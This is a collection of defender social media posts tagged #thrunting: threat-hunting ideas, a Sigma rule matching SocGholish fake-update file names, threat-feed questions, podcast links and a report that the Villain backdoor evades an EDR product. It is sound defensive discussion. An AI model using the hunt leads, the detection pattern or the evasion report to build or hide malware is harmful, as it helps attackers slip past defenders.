Had a fun topic pop up on my #github feed today, looks like a nice hub for #malware. If only I had time to look at it 😭

https://github.com/topics/cs-go-hack-2023

(DISCLAIMER: Don't be dumb, no one is giving you csgo hax, just get good at the game lmao)

#infosec #thrunting

#Windows thrunting idea:

#LOLBIN’s making #DNS queries to domains under 6 months old 🤔

Hypothesis: malware domains are typically younger, fp’s should be fairly easy to identify, and this may shrink the sample size for large orgs

#ThreatHunting #Thrunting #ThreatIntel #InfoSec #Cyber #CyberSecurity #InformationSecurity

#CTI #ThreatIntel #ThreatHunting #Thrunting #Indicators #Behaviors #Shitposting

When did Thrunting become a thing? Did we really need to shorten threat hunting? #thrunting #threathunting

#Thrunting #ThreatHunting #Infosec

I totally forgot about this place!! But hey maybe I should be involved again.

To my #CTI #SOC folks out there, what do you do with the massive scanning IP threat feeds? Are you ingesting them into SIEM for alerting?

If you are ingesting bot IPs and scanning IPs, what confidence and severity level do you set your threshold to ingest high fidelity indicators?

I want to know what everyone’s thoughts and strategies are on ingesting low-yield indicators.

#threatintel
#ioc
#soc
#threathunting
#thrunting

It is Thrunting Thursday - what are you looking for today?

I'll be looking for .lnk files that spawn processes with a child or grandchild process that is cmd or powershell - especially originating from non C:\ drives

#thrunting #threathunting #blueteam #detection

New episode of DISCARDED! 🎙️🔮

We’re joined by Rich Gonzalez, Daniel Blackford, and @adorais to talk about what we expect to see from threat actors in this year. Lots of really great insights about actor TTP changes, vulnerability exploitation, MFA bypass, and more. Tune in!

#podcast #cybersecurity #threatintelligence #threatdetection #thrunting

Apple: https://podcasts.apple.com/us/podcast/discarded-tales-from-the-threat-research-trenches/id1612506550?i=1000596376028

Spotify: https://open.spotify.com/episode/15SwTlR0ziMoHSfSAJVuyC?si=b5268e7df9f744e5

Google: https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zb3VuZGVyLmZtLzE5ODY3L3Jzcy54bWw/episode/aHR0cHM6Ly9hcGkuc3ByZWFrZXIuY29tL2VwaXNvZGUvNTI1MzI2MTc

Web: https://www.proofpoint.com/us/podcasts/discarded#123486

It is THRUNTING THURSDAY!

What are you hunting for today?

#thrunting #threathunting #thruntingthursday

You can't teach instinct. But you can train it and foster it and let it grow, and within a few months suddenly the folks who joined after you and felt overwhelmed are carving out evil and smashing badness every day. #blueteam #thrunting

what are your favorite things to do with #PowerShell to #ActiveDirectory? I've been cleared to poke at a target.

#redTeam #blueTeam #infosec #pentest #threathunting #thrunting

I found this through someone on here, but I cannot seem to find the original posting. This site is a must share though for threat hunters:

https://app.tidalcyber.com/share/f09fa1b1-51a6-4a6f-98ff-de2b86cee0cd

This site is awesome. Not only does it display the MITRE stuff, this shared matrix gives you so much more. What blew me away specifically about Tidal was that not only does it show the technique used, IT LITERALLY SHOWS YOU WHAT DEFENSE SOFTWARE CAN DETECT IT AND WHAT RULE TO ENABLE TO DETECT IT! This is so awesome! Below is an example for Elastic, among others: https://app.tidalcyber.com/capability/521674d6-6514-4e34-bc21-162323ac830b-Account%20Password%20Reset%20Remotely

Happy hunting and learning!
#threatintel #threathunting #security #ELK #elastic #thrunting

Kudos to virustotal for the cheatsheet they dropped today (https://blog.virustotal.com/2022/12/vt-intelligence-cheat-sheet.html). They already had their various search modifiers documented, but this gives a dense set of concrete examples of how they can be used in realistic threat hunting queries. #CTI #VTI #virustotal #thrunting

A colleague of mine discovered a pattern in the downloaded stage 3 SocGholish payload. We've seen a few examples of this file in the most recent campaign where they use special characters in their file name such as:

Chromе.Uрdatе.zip

We've noticed a pattern though - in all of our SIEM queries the TargetFilePath always had the characters 'dat' as a filename.

As such we wrote a simple Sigma rule that can identify that file name. This of course is only useful for this current campaign and the TA can easily adjust file names - but it may be helpful for threat hunting!

TargetFileName|contains:
- "dat\\ufffd\\ufffd.zip"

https://github.com/joshnck/Sigma_Rules/blob/main/apt_socgholish_fakeupdate.yml

#SocGholish #thrunting #threathunting #ioc

Attack surface does not just mean "known vulnerability" i.e. a public CVE. It means anywhere your technical controls are lax or cannot be implemented in their usual format. #blueteam #thrunting

#infosec #thrunting all y'all getting huffy about your timelines like

hey #infosec if you ain't posting my little pony memes today you ain't #thrunting hard enough for a Friday

This industry will hammer on as many high speed low-drag topics as possible: zero-trust, AI/ML analysis/-enabled EDR, vendor partnerships to increase cloud security...and the entirety of the conversation will happen between 10 people via an on-prem Exchange 2012 server through Office 2008 Outlook installs.

#attacksurface #thrunting

After a several week hiatus #AvosLocker has started bidding in auctions held by initial access brokers again. I expect to see new victims posted soon on their blog. #OSINT #ThreatIntel #CTI #ransonware #thrunting

New Villain (improved Hoaxshell) backdoor runs without obfuscation on #Crowdstrike falcon Win10 machine. It previously had bypassed Defender and SentinalOne also.
I've sent data to our CS reps to make them aware.
#infosec #thrunting